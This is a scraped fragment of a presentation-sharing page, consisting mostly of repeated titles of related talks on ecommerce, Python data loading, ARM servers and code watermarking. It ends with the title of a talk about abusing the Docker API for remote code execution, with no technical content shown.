Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdf
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
 
Watermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security ChallengesWatermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security Challenges
 

How abusing the Docker API led to remote code execution same origin bypass and persistence